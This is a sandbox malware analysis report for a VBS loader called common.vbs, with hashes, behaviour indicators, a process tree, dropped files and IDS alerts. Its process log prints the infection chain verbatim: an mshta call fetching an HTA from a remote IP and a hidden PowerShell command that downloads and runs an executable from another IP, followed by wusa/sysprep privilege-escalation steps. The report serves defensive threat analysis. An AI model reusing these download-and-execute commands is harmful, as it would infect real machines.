analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

common.vbs

Full analysis: https://app.any.run/tasks/091c8d43-6786-4b29-a585-2a57b607953c
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Analysis date: November 14, 2018, 11:32:37
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
trojan
loader
Indicators:
MIME: text/plain
File info: ASCII text, with very long lines
MD5:

2BF3F6B5805BDF4B20D409BDC9F4F34A

SHA1:

8EA2CB1492C3B8671A7E004C5F9EC80BB231FFCA

SHA256:

771A8F83A0C6F08B2060D86FCBD40D36EE3A681BEADB32FF6F288E2648C64BF9

SSDEEP:

192:h7rezsm5/vygP8jggQhYXgLee22Gptn4NNf+frfbdPbZggAz5ahGE9NuuiMg1gMS:hWzs+/z8yiwLYfn4zyzD0N0T

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Executes PowerShell scripts

      • mshta.exe (PID: 1972)
    • Downloads executable files from IP

      • powershell.exe (PID: 3200)
    • Downloads executable files from the Internet

      • powershell.exe (PID: 3200)
    • Application was dropped or rewritten from another process

      • UGjJgMwmRLHM.exe (PID: 1860)
      • pyxduhotid.exe (PID: 3368)
      • UGjJgMwmRLHM.exe (PID: 3596)
      • rundll32.exe (PID: 2424)
      • WUAUCTL.EXE (PID: 3816)
      • WUAUCTL.EXE (PID: 2320)
    • Loads dropped or rewritten executable

      • sysprep.exe (PID: 3920)
      • rundll32.exe (PID: 2424)
      • svchost.exe (PID: 852)
      • SearchProtocolHost.exe (PID: 716)
      • WUAUCTL.EXE (PID: 2320)
      • WUAUCTL.EXE (PID: 3816)
    • Starts NET.EXE for service management

      • UGjJgMwmRLHM.exe (PID: 3596)
    • Runs PING.EXE for delay simulation

      • cmd.exe (PID: 2020)
  • SUSPICIOUS

    • Creates files in the user directory

      • powershell.exe (PID: 3200)
    • Starts MSHTA.EXE for opening HTA or HTMLS files

      • WScript.exe (PID: 1388)
    • Creates files in the Windows directory

      • powershell.exe (PID: 3200)
      • wusa.exe (PID: 2552)
      • sysprep.exe (PID: 3920)
      • svchost.exe (PID: 852)
    • Executable content was dropped or overwritten

      • powershell.exe (PID: 3200)
      • UGjJgMwmRLHM.exe (PID: 1860)
      • wusa.exe (PID: 2552)
      • UGjJgMwmRLHM.exe (PID: 3596)
      • svchost.exe (PID: 852)
    • Starts CMD.EXE for commands execution

      • pyxduhotid.exe (PID: 3368)
      • sysprep.exe (PID: 3920)
      • UGjJgMwmRLHM.exe (PID: 3596)
    • Creates or modifies windows services

      • svchost.exe (PID: 852)
    • Uses RUNDLL32.EXE to load library

      • pyxduhotid.exe (PID: 3368)
    • Removes files from Windows directory

      • wusa.exe (PID: 2552)
      • svchost.exe (PID: 852)
      • cmd.exe (PID: 2020)
    • Starts application with an unusual extension

      • cmd.exe (PID: 1992)
    • Creates a software uninstall entry

      • svchost.exe (PID: 852)
  • INFO

    • Reads internet explorer settings

      • mshta.exe (PID: 1972)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
65
Monitored processes
24
Malicious processes
10
Suspicious processes
3

Behavior graph

Click at the process to see the details
start drop and start drop and start drop and start drop and start wscript.exe no specs mshta.exe powershell.exe ugjjgmwmrlhm.exe extrac32.exe no specs pyxduhotid.exe no specs cmd.exe no specs wusa.exe no specs wusa.exe no specs wusa.exe rundll32.exe no specs sysprep.exe ugjjgmwmrlhm.exe cmd.exe no specs ping.exe no specs extrac32.exe no specs net.exe no specs cmd.exe no specs net1.exe no specs chcp.com no specs svchost.exe searchprotocolhost.exe no specs wuauctl.exe no specs wuauctl.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
1388"C:\Windows\System32\WScript.exe" "C:\Users\admin\AppData\Local\Temp\common.vbs"C:\Windows\System32\WScript.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Version:
5.8.7600.16385
1972mshta http://142.93.217.247/uecVE3zJeiTn.htaC:\Windows\System32\mshta.exe
WScript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft (R) HTML Application host
Exit code:
0
Version:
8.00.7600.16385 (win7_rtm.090713-1255)
3200"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden (new-object System.Net.WebClient).DownloadFile('http://174.138.121.3/sFTkeOnpEUqW.exe', 'c:/windows/temp/UGjJgMwmRLHM.exe'); Sleep 20; c:/windows/temp/UGjJgMwmRLHM.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
mshta.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
1860"C:\windows\temp\UGjJgMwmRLHM.exe"C:\windows\temp\UGjJgMwmRLHM.exe
powershell.exe
User:
admin
Company:
msxvr
Integrity Level:
MEDIUM
Description:
mscache acclerate
Exit code:
0
Version:
5, 3, 1, 0
3460extrac32 C:\Users\admin\AppData\Local\Temp\jusFE31.tmp /L "C:\Users\admin\AppData\Local\"C:\Windows\system32\extrac32.exeUGjJgMwmRLHM.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft® CAB File Extract Utility
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3368C:\Users\admin\AppData\Local\pyxduhotid.exe "C:\windows\temp\UGjJgMwmRLHM.exe"C:\Users\admin\AppData\Local\pyxduhotid.exeUGjJgMwmRLHM.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
1
3096cmd /c wusa "C:\Users\admin\AppData\Local\Temp\ccpbse.ctl" /extract:C:\Windows\system32\sysprep /quietC:\Windows\system32\cmd.exepyxduhotid.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2816wusa "C:\Users\admin\AppData\Local\Temp\ccpbse.ctl" /extract:C:\Windows\system32\sysprep /quietC:\Windows\system32\wusa.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Update Standalone Installer
Exit code:
3221226540
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3824"C:\Windows\system32\wusa.exe" "C:\Users\admin\AppData\Local\Temp\ccpbse.ctl" /extract:C:\Windows\system32\sysprep /quietC:\Windows\system32\wusa.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Update Standalone Installer
Exit code:
3221226540
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2552"C:\Windows\system32\wusa.exe" "C:\Users\admin\AppData\Local\Temp\ccpbse.ctl" /extract:C:\Windows\system32\sysprep /quietC:\Windows\system32\wusa.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows Update Standalone Installer
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
839
Read events
741
Write events
0
Delete events
0

Modification events

No data
Executable files
6
Suspicious files
10
Text files
7
Unknown types
11

Dropped files

PID
Process
Filename
Type
3200powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\1DPPWYW9KOYGXICL2HYY.temp
MD5:
SHA256:
1860UGjJgMwmRLHM.exeC:\Users\admin\AppData\Local\Temp\jusFE31.tmp
MD5:
SHA256:
3460extrac32.exeC:\Users\admin\AppData\Local\tmp4246.tmp
MD5:
SHA256:
2552wusa.exeC:\Windows\system32\sysprep\$dpx$.tmp\eb99378eadbbb64486213bd01b4330d0.tmp
MD5:
SHA256:
2552wusa.exeC:\Windows\Logs\DPX\setuperr.log
MD5:
SHA256:
3920sysprep.exeC:\Users\admin\AppData\Local\Temp\lst152.tmp
MD5:
SHA256:
3920sysprep.exeC:\Windows\system32\sysprep\Panther\setuperr.log
MD5:
SHA256:
3596UGjJgMwmRLHM.exeC:\Users\admin\AppData\Local\Temp\jus5A5D.tmp
MD5:
SHA256:
3192extrac32.exeC:\Users\Public\ODBC\ODBC0\tmp40FB.tmp
MD5:
SHA256:
3596UGjJgMwmRLHM.exeC:\Users\admin\AppData\Local\TpTemp\lgt5ADB.tmp
MD5:
SHA256:
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
2
TCP/UDP connections
4
DNS requests
0
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3200
powershell.exe
GET
200
174.138.121.3:80
http://174.138.121.3/sFTkeOnpEUqW.exe
US
executable
948 Kb
suspicious
1972
mshta.exe
GET
200
142.93.217.247:80
http://142.93.217.247/uecVE3zJeiTn.hta
CA
html
602 b
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3200
powershell.exe
174.138.121.3:80
US
suspicious
122.10.89.172:4432
Cloudie Limited
HK
malicious
1972
mshta.exe
142.93.217.247:80
CA
malicious

DNS requests

No data

Threats

PID
Process
Class
Message
1972
mshta.exe
A Network Trojan was detected
SC TROJAN_DOWNLOADER Suspicious HTA application download
1972
mshta.exe
Potentially Bad Traffic
ET POLICY Possible HTA Application Download
1972
mshta.exe
Attempted User Privilege Gain
ET CURRENT_EVENTS SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl
1972
mshta.exe
Attempted User Privilege Gain
ET WEB_CLIENT HTA File containing Wscript.Shell Call - Potential CVE-2017-0199
1972
mshta.exe
A Network Trojan was detected
ET CURRENT_EVENTS SUSPICIOUS MSXMLHTTP DL of HTA (Observed in CVE-2017-0199)
3200
powershell.exe
A Network Trojan was detected
ET INFO Executable Download from dotted-quad Host
3200
powershell.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
3200
powershell.exe
Potentially Bad Traffic
ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
3200
powershell.exe
Potentially Bad Traffic
ET INFO SUSPICIOUS Dotted Quad Host MZ Response
1 ETPRO signatures available at the full report
No debug info